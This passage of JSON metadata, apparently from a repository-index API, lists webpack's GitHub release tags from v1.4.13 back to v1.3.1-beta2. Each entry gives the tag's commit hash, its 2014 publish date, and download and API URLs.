rl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecos